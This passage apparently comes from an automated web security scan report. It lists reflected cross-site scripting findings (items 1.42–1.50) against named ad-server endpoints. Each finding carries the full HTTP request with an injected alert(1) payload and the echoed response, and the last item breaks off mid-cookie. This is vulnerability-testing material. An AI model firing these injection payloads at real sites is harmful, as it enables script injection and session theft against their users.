Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTkROQk9FRkNSa0V0TnpRNU55MDBOekZCTFRsQlJqWXRNamszTkVReE4wVkdNek0xL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82NjQ5MDU0NzkyOTkyMTg5Mi8xMDk2NzUvMTAyMTc0LzMvcUNrUlV0a2tSODZTZllSNWtDMUZwb3dud0hreW5rUUl0bkxKeWNpUWlUcy8/65jF72MGHLbwsG7rxNVZ3X0o4uc&price=3.050000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6894
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 12:46:45 GMT
Expires: Sun, 20 Mar 2011 12:46:45 GMT

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
9396912%3B4307-300/250%3B39654878/39672665/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=66490547929921892&mt_id=109675&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=410c5"-alert(1)-"4ae461324e6https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM");
var fscUrl = url
...[SNIP]...

1.42. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.4 [redirect parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N553.mediamath/B5123370.4

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45adf'-alert(1)-'5fea6eceeef was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.4;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=66490547929921892&mt_id=109675&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=45adf'-alert(1)-'5fea6eceeef HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTkROQk9FRkNSa0V0TnpRNU55MDBOekZCTFRsQlJqWXRNamszTkVReE4wVkdNek0xL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82NjQ5MDU0NzkyOTkyMTg5Mi8xMDk2NzUvMTAyMTc0LzMvcUNrUlV0a2tSODZTZllSNWtDMUZwb3dud0hreW5rUUl0bkxKeWNpUWlUcy8/65jF72MGHLbwsG7rxNVZ3X0o4uc&price=3.050000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6894
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 12:46:49 GMT
Expires: Sun, 20 Mar 2011 12:46:49 GMT

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
9396912%3B4307-300/250%3B39654878/39672665/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=66490547929921892&mt_id=109675&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=45adf'-alert(1)-'5fea6eceeefhttps%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM\">
...[SNIP]...

1.43. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.4 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N553.mediamath/B5123370.4

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbbaa"-alert(1)-"190fa0ece84 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.4;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=66490547929921892fbbaa"-alert(1)-"190fa0ece84&mt_id=109675&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=66490547929921892? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTkROQk9FRkNSa0V0TnpRNU55MDBOekZCTFRsQlJqWXRNamszTkVReE4wVkdNek0xL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82NjQ5MDU0NzkyOTkyMTg5Mi8xMDk2NzUvMTAyMTc0LzMvcUNrUlV0a2tSODZTZllSNWtDMUZwb3dud0hreW5rUUl0bkxKeWNpUWlUcy8/65jF72MGHLbwsG7rxNVZ3X0o4uc&price=3.050000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 12:44:07 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 12:44:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6894

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
p://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/a6/%2a/w%3B235630583%3B0-0%3B0%3B59396912%3B4307-300/250%3B39654878/39672665/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=66490547929921892fbbaa"-alert(1)-"190fa0ece84&mt_id=109675&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D
...[SNIP]...

1.44. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.4 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N553.mediamath/B5123370.4

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7cacd'-alert(1)-'1e32a69aa03 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.4;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=664905479299218927cacd'-alert(1)-'1e32a69aa03&mt_id=109675&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=66490547929921892? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTkROQk9FRkNSa0V0TnpRNU55MDBOekZCTFRsQlJqWXRNamszTkVReE4wVkdNek0xL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82NjQ5MDU0NzkyOTkyMTg5Mi8xMDk2NzUvMTAyMTc0LzMvcUNrUlV0a2tSODZTZllSNWtDMUZwb3dud0hreW5rUUl0bkxKeWNpUWlUcy8/65jF72MGHLbwsG7rxNVZ3X0o4uc&price=3.050000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 12:44:11 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 12:44:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6894

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
p://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/a6/%2a/w%3B235630583%3B0-0%3B0%3B59396912%3B4307-300/250%3B39654878/39672665/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=664905479299218927cacd'-alert(1)-'1e32a69aa03&mt_id=109675&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3D
...[SNIP]...

1.45. http://ad.doubleclick.net/adj/cm.mtv/games_010111 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.mtv/games_010111

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 148eb'-alert(1)-'b5399e8c258 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.mtv/games_010111;net=cm;u=,cm-57639981_1300624460,11e4f07c0988ac7,music,ax.300-am.bk-cm.sportsreg-cm.sports_m-cm.ent_m-qc.ac-ex.6-bz.30-bz.51-bz.25-bz.ab-bz.ae-wfm.difi_h-iblocal.sports_h;;cmw=nurl;sz=728x90;net=cm;env=ifr;ord1=595575;contx=music;an=300;dc=d;btg=am.bk;btg=cm.sportsreg;btg=cm.sports_m;btg=cm.ent_m;btg=qc.ac;btg=ex.6;btg=bz.30;btg=bz.51;btg=bz.25;btg=bz.ab;btg=bz.ae;btg=wfm.difi_h;btg=iblocal.sports_h;ord=[timestamp]?&148eb'-alert(1)-'b5399e8c258=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/hserver/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 945
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 12:36:12 GMT
Expires: Sun, 20 Mar 2011 12:36:12 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad0/0/0/%2a/z;237304068;0-0;2;58298671;3454-728/90;33967937/33985815/1;u=,cm-57639981_1300624460,11e4f07c0988ac7,music,ax
...[SNIP]...
fr;ord1=595575;contx=music;an=300;dc=d;btg=am.bk;btg=cm.sportsreg;btg=cm.sports_m;btg=cm.ent_m;btg=qc.ac;btg=ex.6;btg=bz.30;btg=bz.51;btg=bz.25;btg=bz.ab;btg=bz.ae;btg=wfm.difi_h;btg=iblocal.sports_h;;148eb'-alert(1)-'b5399e8c258=1;~aopt=2/0/ec/0;~sscs=%3fhttp://www.questionsprotect.org">
...[SNIP]...

1.46. http://ad.doubleclick.net/adj/cm.mtv/games_010111 [net parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.mtv/games_010111

Issue detail

The value of the net request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6066d'%3balert(1)//1efea876fbb was submitted in the net parameter. This input was echoed as 6066d';alert(1)//1efea876fbb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.mtv/games_010111;net=6066d'%3balert(1)//1efea876fbb HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/hserver/height=90/width=728/site=SW.NOL/aamsz=728X90/NCP=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 367
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 12:35:04 GMT
Expires: Sun, 20 Mar 2011 12:35:04 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad0/0/0/%2a/i;237555196;0-0;0;58298671;255-0/0;40592900/40610687/1;;~okv=;net=6066d';alert(1)//1efea876fbb;~aopt=3/0/ec/0;~sscs=%3fhttp://simongjewelry.com/collection.php">
...[SNIP]...

1.47. http://ad.doubleclick.net/adj/lj.homepage/loggedout [a parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/lj.homepage/loggedout

Issue detail

The value of the a request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 869a2'%3balert(1)//bed4bf97c8c was submitted in the a parameter. This input was echoed as 869a2';alert(1)//bed4bf97c8c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/lj.homepage/loggedout;a=869a2'%3balert(1)//bed4bf97c8c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 282
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 12:39:32 GMT
Expires: Sun, 20 Mar 2011 12:39:32 GMT

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ad0/0/0/%2a/j;44306;0-0;0;40107501;2321-160/600;0/0/0;;~okv=;a=869a2';alert(1)//bed4bf97c8c;~sscs=%3f"><img src="http://s0.
...[SNIP]...

1.48. http://ad.doubleclick.net/adj/lj.homepage/loggedout [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/lj.homepage/loggedout

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15033'-alert(1)-'50a19f18de6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/lj.homepage/loggedout?15033'-alert(1)-'50a19f18de6=1 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 282
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 14:02:44 GMT
Expires: Sun, 20 Mar 2011 14:02:44 GMT
Connection: close

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3ad0/0/0/%2a/j;44306;0-0;0;40107501;2321-160/600;0/0/0;;~okv=;15033'-alert(1)-'50a19f18de6=1;~sscs=%3f"><img src="http://s0.
...[SNIP]...

1.49. http://ad.doubleclick.net/adj/oiq.rmx/ [click0 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/oiq.rmx/

Issue detail

The value of the click0 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14f16'-alert(1)-'6a4d6150a99 was submitted in the click0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/oiq.rmx/;click0=14f16'-alert(1)-'6a4d6150a99 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?KnKABBt0GAAyz4UAAAAAAKwUIgAAAAAAAgAAAAYAAAAAAP8AAAABCXmeHQAAAAAAhIAMAAAAAABBtywAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH0QoAAAAAAAIAAwAAAAAASOF6FK5H9D9I4XoUrkf0PzMzMzMzM.8.MzMzMzMz.z8AAAAAAAAKQAAAAAAAAApAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3L--oUODOCQ2GUYTDE8B7CXQaUTsKgNAeJyW0AAAAAA==,,http%3A%2F%2Fbuzzya.com%2F,Z%3D728x90%26s%3D1602587%26_salt%3D483929992%26B%3D10%26u%3Dhttp%253A%252F%252Fbuzzya.com%252F%26r%3D0,db8cfe30-52f2-11e0-8af9-003048d6d232
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 360
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 13:16:28 GMT
Expires: Sun, 20 Mar 2011 13:16:28 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad0/14/1c/%2a/k;227869823;0-0;0;40342997;4307-300/250;37969296/37987053/1;;~sscs=%3f14f16'-alert(1)-'6a4d6150a99http://owneriq.com/advertisers?src=300x250_blue">
...[SNIP]...

1.50. http://ad.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf8e7"><script>alert(1)</script>c2a54bafa56 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=bf8e7"><script>alert(1)</script>c2a54bafa56 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=Wonw4SKQzJYWGPurqxtl0nuUzYJk6jXTg2kkRxPsf5PfaqaDzVRu9ZiuBStYaftYL8XNm3b3wEFLrI-bYDGMZspa2dzalgG5fKshqZFQ0gPE-iovOq8fXLrOOSDX_7RE4aP5h09o7k3cRcJp8kFALhcUtCbH2AU91mt_IKIcvF-dnVEIXl_o2VKbCOQ18gKB3TdfaSMq8ZmQLhPF-HDmXEO0DkgoB2K7NtvRYr_WLBLd_glL1pkpHKTZt_lIPJBER1eWajsac7h1LLqoQJdxq_LVmIVMjE0CeQFu2rmZbM75ztlAPWqlo6WakHRHQDJIug3BBFPTzPZU9a_De5ObQfS-FOkT22lzSBi1SyH2rdOEyvGy9ARJOsbfKu5zwAtywK2T6I_iNDRolqjg1OzTcmOmBomBI971b1aEnAXt992jScb5ykHoHXGqgsU2JXsEhKy7DL4leWeiolkQACcMJeDFfNLII8GWE_POOZEqdvSAlwAd2SMpuXja-1oqTvA74Bv87ktR-V-CI_fBW8ozCqpHrzMG7a1O-Bw1uWV3nCTXMMhqubSRk012wJ9TI5YEXDd38XvwUG3nRYRagkvUuiCki6dv9_ZBTPOR80NtxF90Tx9NnkbuE9oFmALVgGEUfnOnpPStJvBD7eMTp4e86K9aYVqIo0QJ8uo_fgCPTXl4d6AzZ5kL0Q3seR-QMTT54aP5h09o7k3cRcJp8kFALqjI0RR666J6yMcKhWq6NL-dnVEIXl_o2VKbCOQ18gKB5OTiSkIyAtUIxcH0kc2Z_r8mFTCd5ttVGpgCWv23BFzd_glL1pkpHKTZt_lIPJBEcjaG10wigUMyya21D2XcWPLVmIVMjE0CeQFu2rmZbM6gr6LeWJgmS_GYEF0jBxMut0ENHBIEVq_lRqV1FbhAaWaIpCiKWJzFCjE_rpqGSQ_AMLkX3xVdMEoiwUWtkl_8wK2T6I_iNDRolqjg1OzTckKhKx8gNr7j1i4lKSwVZVo5786SEOCxaDqnPJjkYPAbhKy7DL4leWeiolkQACcMJcv5JGu7PR53V4XHAO3Io4OAlwAd2SMpuXja-1oqTvA7Sby-AWn9Ao08NtBsZeyI32iQebtfIQ-g95Am5CKbjjGdX9SGy_mLofSIrTkkkZy7q_kymVsfRU5lp0Pu2QVi0ARmUVnGxwLABzMMwaHgl6ZZhmeV2wkprz8192ZLKDYi5nfmk03YwEf-csTjfghefqxfpgzc1VS-2ZSEBy1bfilWXaAbFc49ghutKx-kX83sFbZDNzeTaTd_CskNnL-gJYUhrqV02c7lrfNhksNY6EUSKZoIDqD4G7bFKUqmMV-obRSQfOqKLvEIVYVzZt3x7fyt1kS60aRmpMuHWG916ExzRX1Syet26XYSL2aR6sdzgDpDtFR-MhBo4SKLASMedrNlhtwwehJKZV_vqQ6TPomFT0b0CNqL1yDov6pCERYHrjdcB3-hMeuXpkthOjrlfmpI2EXioEJjgLbV10VkcXuhwiZ-NmqDn980RgRl5YCRsSMBuuGGbFuPRJa8whW0k6IDQXAakeNb4-iGLLL6vhICsdnGaSRoEnqOcIv7G5CzrcZxzHUt8FlPxz9qsQnKe4yFw3wjTmxxOfzbjyejukYkwsYpf4klfvVA_XCLxuitV-DkChzNBAZA7664Ecm9sJ8KpnA_mwIUzpMMvoHHE8H69Nv8ZmvmIfccRX7ppIDmK81F_-m52Kk6mklb9Gkz7cULXDK_DJBsJiPg260VBuB21BharSCDQyZkIvsj3tYWKCBcgK1KIuX3WD1wJn8hu0zvl4YurMpkt_KNXf21GXmMh3NIrtrwJ-PytJzw0bCN1JbrGOVJbR84q2JjTjm8h96r_zTQjil_yu87szG0AJSpAmYGrgDwofgjre60aLEVwGQ7VXceHmC6gPGCEolElhIpmggOoPgbtsUpSqYxX6hAIdI1m55J5HPTGq2yMrwQrQe8folUTs7yHBhE3jXdIqirG5pEDTVYoLJvdXZlZ78KIcHzd1FxJAPOlCIDY7YsrjdcB3-hMeuXpkthOjrlfnsK60K6G5zIvDNin7d_-XihwiZ-NmqDn980RgRl5YCRK7JzRSpPkaFxPAb0V4qxxlETd_XsDWTPOMhkKKyRYsQCsdnGaSRoEnqOcIv7G5CzlX-q_nDsklvWZp_SxUEVsoyFw3wjTmxxOfzbjyejukagr6LeWJgmS_GYEF0jBxMulbT4k7I3RFcH9USEGB8d7ehp9hmy5VmQ13eGV0p5qLQhVwiAdydT3PpB-fIjCiWZK81F_-m52Kk6mklb9Gkz7Z0a7PGvOJoJ72EBTvuMQxml7tqppY6LFE2g2xxURyWGmrwVBz_RVN4-Di2560zu3yYkwvb4gvrvji-WnwN0XjuMh3NIrtrwJ-PytJzw0bCNnaladC9RU6ry0d69z-Zz7SkUb9qGemCfvAL5h3MLwHvc3yMGel4rk0Sx0kOS5kYLJdP9tfIoTz5TKsdQg5NBZiXT_bXyKE8-UyrHUIOTQWZQlrT0o0JDb5JXBZDXw8ZNGElOiRir5xHZ8kAaarjTbBhJTokYq-cR2fJAGmq402wYSU6JGKvnEdnyQBpquNNsGElOiRir5xHZ8kAaarjTbJUxYTKvEAE3JAT4SvkHOGiVMWEyrxABNyQE-Er5BzholTFhMq8QATckBPhK-Qc4aJUxYTKvEAE3JAT4SvkHOGgqNhuM1tUzQHYZ3GHdzM7ZKjYbjNbVM0B2Gdxh3czO2XJ9Sw3jdHwwRW1AzobtH9t81_gjdGUYVukJY8YG-hGu4FfPONitGRcGxKttYjNpmYIlBZfRYA7Tno9giphEEaGCJQWX0WAO056PYIqYRBGhgiUFl9FgDtOej2CKmEQRocaN03oKZzXwNGGcrv63Acnqd9GbyVer5Y4us9rEa4pE6nfRm8lXq-WOLrPaxGuKRPkX-td7VA8q5XtcSwY3rEtaHZAo8fYosnagZHyU5kzUakfxoAiYEuqsAs6lVyErOLNUzJM8pvIuJwp8fvrU-Bkl0_218ihPPlMqx1CDk0FmJdP9tfIoTz5TKsdQg5NBZiXT_bXyKE8-UyrHUIOTQWYl0_218ihPPlMqx1CDk0FmUJa09KNCQ2-SVwWQ18PGTRhJTokYq-cR2fJAGmq402wYSU6JGKvnEdnyQBpquNNsGElOiRir5xHZ8kAaarjTbNWAVpIeQy-_rvNmNJZl0MuVMWEyrxABNyQE-Er5BzholTFhMq8QATckBPhK-Qc4aJUxYTKvEAE3JAT4SvkHOGi4IMq_Q-b1Bsvq4IHMVMMGKjYbjNbVM0B2Gdxh3czO2So2G4zW1TNAdhncYd3MztkqNhuM1tUzQHYZ3GHdzM7ZF_hnwsZOFT5I4eRW46LWcrCzHp4KI8EJF3gYURnVkXqwsx6eCiPBCRd4GFEZ1ZF6ONWHBOP2kK7zVWFthcPDncbv-tY65jMfDKTbdfT8ug3G7_rWOuYzHwyk23X0_LoNxu_61jrmMx8MpNt19Py6Dcbv-tY65jMfDKTbdfT8ug1ygQv0vtIAWYRj1Bwp4i9DzbefliSJ1pdkKBMKwCbwM7hvU7dM3_gDWrNcfv9Lfj8; 